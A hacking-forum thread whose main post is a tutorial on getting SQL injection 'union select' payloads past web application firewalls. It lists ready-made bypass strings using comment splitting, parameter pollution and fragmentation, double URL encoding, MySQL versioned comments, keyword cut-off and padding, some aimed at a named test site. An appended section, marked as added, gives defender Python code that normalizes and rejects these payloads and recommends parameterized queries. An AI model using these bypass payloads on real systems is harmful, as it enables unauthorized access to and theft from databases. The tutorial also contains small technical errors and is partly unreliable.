[Tutorial] Full SQLi Waf Guide/Details


#1
TimeCenter (Hack The Time :D)
Posts: 79, Reputation: 5, Joined: 08 Jul, 2016
Today we will focus on 'union select' WAF bypassing.

#A# Bypassing WAF: SQL Injection - Normal Method

(1) Using a vulnerability in the request normalization function.

• The following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*


• If there is a corresponding vulnerability in the WAF, this request

will be successfully performed

 /?id=1/*union*/union/*select*/select+1,2,3/*


• After being processed by WAF, the request will become

 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*


The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.

(2) Using a vulnerability in the request normalization function.

• Similarly, the following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*


• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

 /?id=1+un/**/ion+sel/**/ect+1,2,3--


• The SQL request will become

 SELECT * from table where id =1 union select 1,2,3--


Instead of the /**/ construction, any symbol sequence that the WAF cuts off can be used.

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

(3) Using HTTP Parameter Pollution (HPP)

• The following request doesn’t allow anyone to conduct an attack

 /?id=1;select+1,2,3+from+users+where+id=1--


• This request will be successfully performed using HPP

 /?id=1;select+1&id=2,3+from+users+where+id=1--


Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked.

(4) Using HTTP Parameter Pollution (HPP)

• Vulnerable code

SQL=" select key from table where id= "+Request.QueryString("id")

• This request is successfully performed using the HPP technique

 /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users


• The SQL request becomes

 select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users


Bypassing WAF: SQL Injection – HPF

Using HTTP Parameter Fragmentation (HPF)

• Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);


• The following request doesn’t allow anyone to conduct an attack

 /?a=1+union+select+1,2/*


• These requests may be successfully performed using HPF

 /?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--


• The SQL requests become

 select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--


(5) Using distinct & distinctROW


+union+distinct+select+
+union+distinctROW+select+


+union%20distinct%20select+
+union%20%64istinctRO%57%20select+


(6) using [ HTTP encoding ] [ URL encoded WAF bypass Payload ] [ double encoding ]

If the WAF blocks 'union' and 'select' together, the way to bypass that is to use Union %23aa%0a Select.

[url encoded]
+%55nion %53elect %55nion(%53elect)


[Space (%20); #Most commonly used]
+union%20select%20


/%2A%2A/union/%2A%2A/select
%252f%252a*/UNION%252f%252a*/SELECT


[multi-line comments /**/] –

[id=999999.9%2F**%2FuNiOn%2F**%2FaLl%2F**%2FsElEcT%2F**%2F]

Multi-line comments start with /* and end with */.

Any text between /* and */ will be ignored by JavaScript.

%2F**%2Funion%2F**%2Fselect 


/**/UnIoN/**/SeLecT/**/
/*!50000Union*/ SeLEct
/*!50000UnIoN*/ /*!50000SeLeCt*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
/**YmxhY2tyb3Nl**/UnIoN/**YmxhY2tyb3Nl**/SeLecT/**YmxhY2tyb3Nl**/


(7) Using parentheses instead of spaces ()

+(uNioN)+(sElECt)
+union (select 1,2,3,4,5)
union(select(1),2,3,4,5)
union(select(1),(2),(3),(4),(5))
(-1)union(select(1),(2),(3),(4),(5))


1%')and(0)union(select(1),1,3,4,5,6)%23%23%23
union(select(0),version(),(0),(0),(0),(0))
UNION(SELECT/**_**/(1),2),(3),(4),(5),(6),(7),(8),(9))-- -


(8) Using the Cut-Off Technique

+UNunionION+SEselectLECT+


(9) using Variable Method | WAF after union select |

http://pastebin.com/8Xd7QrWK


(10) Using routed query (double query) injection.

Routed query (double query) injection: for that we will put a single quotation mark after the number of columns. Let's see:

index.php?cat=1 and false UNION SELECT 1',2,3,4,5,6-- -

(here we have also got a sql error and we will also fix it to continue)

We have to bind the column number with double quotation marks (")

index.php?cat=1 and false UNION SELECT "1' -- -",2-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5,6-- - (now query is fixed)

http://testphp.vulnw...s.php?artist=-1 UNION SELECT 1,2,3-- -",2,3,4,5,6-- -

Let's see the video for this method



(11) Using JOIN syntax.

The INNER JOIN keyword selects all rows from both tables as long as there is a match between the columns in both tables.

http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,2,3-- -


After query UNION SELECT add *

artists.php?artist=-1 UNION SELECT *

then add FR0M

artists.php?artist=-1 UNION SELECT * FR0M

Then close each column in brackets (select+1), give this column a nickname (select+1)a, then link it to the other column by JOIN, like

artists.php?artist=-1 union select * from (select 1)a join (select 2)b join (select 3)c -- -


http://testphp.vulnweb.com/artists.php?artist=-1+union+select+*+from+(select+1)a+join+(select+2)b+join+(select+3)c -- -


(12) Using Buffer Overflow.

The WAF blocks 'union' and 'select' together [Forbidden], so the way to bypass that is to use Union %23aa%0a Select.

--%23%0a/*!50000union*/%23AAAAAAAA%0a/*!50000select*/%23AAAAAAAA%0a+


or use this method

+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's), then add it before union select, like:


/*50000and*/(/*!50000%53elect*/ 1)=(/*!32302%53elect*/ 0xAAAAAA 1000 more A’s) /**/ /*!50000%union*/ /*!50000%53elect*/ 1,2,3-- - etc


(13) Using the Column Separator Style WAF bypass.

If we bypass union select but get the WAF when adding the column number, then we test it and add a column separator before the column number that triggers the WAF, like:

id=4'*2e9unioN Select!1,2%23
id=4'*2e9unioN Select!1,2,3%23
id=4'*2e9unioN Select!1,2,3,4%23
id=4'*2e9unioN Select!1,2,3,4,5%23


WAF after 3 columns; let's use the column separator style WAF bypass

Bypassed :- id=4'*2e9unioN Select!1,2,3,~4,5%23

  • 0
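The post's cases (1), (2) and (8) all work against the same design flaw: a filter that deletes a matched keyword or comment once and forwards the rest, which either leaves a second copy behind or assembles the keyword out of the fragments. Cases (5), (6), (7) and (12) work against a filter that matches the raw bytes without first resolving URL encoding, MySQL comments and parentheses, and cases (3), (4) and HPF work because the fragments only meet after the server joins or concatenates the parameters. The following example is added here and is not code from the post or from any WAF product; it shows a defender's normalizer that decodes and resolves comments to a fixed point, rejects (rather than rewrites) requests in which UNION ... SELECT survives, and evaluates duplicated parameters both individually and joined, using the comma join that the post's case (4) shows for Request.QueryString (the exact separator is platform-specific and assumed here). The MySQL comment semantics (/*!NNNNN ... */ contents execute, other comments are whitespace) are the dialect assumed on the page. The payloads fed to it are copied from the post above and are constructed demo inputs.

```python
"""Added example (not the post's code): normalize-then-reject handling of the
UNION SELECT obfuscations listed in the post, from a defender's side."""
import re
from urllib.parse import parse_qsl, unquote_plus

# What survives normalization and must be rejected: UNION [ALL|DISTINCT|DISTINCTROW]
# SELECT, with optional parentheses between the keywords (case 7 on the page).
UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s*\(*\s*select\b", re.I)


def url_decode_fully(value, max_rounds=5):
    """Decode until nothing changes, so double encoding (%252f -> %2f -> /) unwinds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def strip_comments(sql):
    """MySQL comment semantics (assumed dialect): the body of /*!NNNNN ... */ is
    executed, every other comment behaves as whitespace."""
    sql = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", sql, flags=re.S)
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"/\*.*$", " ", sql, flags=re.S)        # unterminated trailing /*
    sql = re.sub(r"(?:#|--)[^\n]*(?:\n|$)", " ", sql)   # line comments, incl. %23...%0a
    return sql


def normalize(value, max_rounds=10):
    """Canonical form for matching: fully decoded, comments resolved, parentheses
    spaced out, whitespace collapsed, lower-cased. Repeated to a fixed point so
    that removing one layer can never leave a fresh, unexamined layer behind."""
    text = url_decode_fully(value)
    for _ in range(max_rounds):
        before = text
        text = strip_comments(text)
        text = re.sub(r"([()])", r" \1 ", text)
        text = re.sub(r"\s+", " ", text).strip().lower()
        if text == before:
            break
    return text


def naive_clean(value, banned=("union", "select")):
    """The behaviour the post exploits in (1) and (8): delete each banned word once
    and forward the remainder. Included only to show why rewriting is the wrong design."""
    for word in banned:
        value = re.sub(word, "", value, count=1, flags=re.I)
    return value


def inspect_query_string(query_string):
    """Return [(scope, normalized_text)] for every view of the query string in
    which UNION ... SELECT is present after normalization.

    Scopes: 'name[i]' for each individual value; 'name:hpp-join' for a duplicated
    parameter joined with ',' (assumed separator, as in the post's case 4);
    '*:hpf-concat' for all values in request order, approximating the HPF case
    where the fragments only meet inside the final SQL string."""
    pairs = parse_qsl(query_string.lstrip("/?"), keep_blank_values=True)
    views, by_name = {}, {}
    for name, value in pairs:
        by_name.setdefault(name, []).append(value)
    for name, values in by_name.items():
        for i, value in enumerate(values):
            views[f"{name}[{i}]"] = value
        if len(values) > 1:
            views[f"{name}:hpp-join"] = ",".join(values)
    views["*:hpf-concat"] = " ".join(value for _, value in pairs)
    hits = []
    for scope, raw in views.items():
        norm = normalize(raw)
        if UNION_SELECT.search(norm):
            hits.append((scope, norm))
    return hits


if __name__ == "__main__":
    # Constructed demo inputs, copied from the payloads in the post above.
    for payload in ["1/*union*/union/*select*/select+1,2,3/*",
                    "+union%20%64istinctRO%57%20select+",
                    "%252f%252a*/UNION%252f%252a*/SELECT",
                    "(-1)union(select(1),(2),(3),(4),(5))",
                    "--%23%0a/*!50000union*/%23AAAAAAAA%0a/*!50000select*/%23AAAAAAAA%0a+"]:
        print(f"{payload!r} -> {normalize(payload)!r}")
    # Rewriting instead of rejecting: the "cleaned" text is still (or only now) an attack.
    for payload in ["1/*union*/union/*select*/select+1,2,3/*", "+UNunionION+SEselectLECT+"]:
        print(f"naive_clean: {payload!r} -> {naive_clean(payload)!r}")
    for qs in ["/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users",
               "/?a=1+union/*&b=*/select+1,2"]:
        print(qs, "->", [scope for scope, _ in inspect_query_string(qs)])
```

Two design points follow from the post's own cases. First, the filter never edits the request: once a view of it normalizes to UNION ... SELECT the whole request is rejected, because deleting matched text is exactly what turns `UNunionION` into `UNION` in case (8) and leaves the inner `union` alive in case (1). Second, normalization is only a detection aid; the vulnerable snippets in the post (string concatenation of `$_GET` values and `Request.QueryString("id")`) are the actual defect, and replacing them with parameterized queries removes the injection regardless of what the WAF matches.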

#2
miller88 (Lurker)
Posts: 8, Reputation: 0, Joined: 22 Aug, 2016

thx bro


  • 0


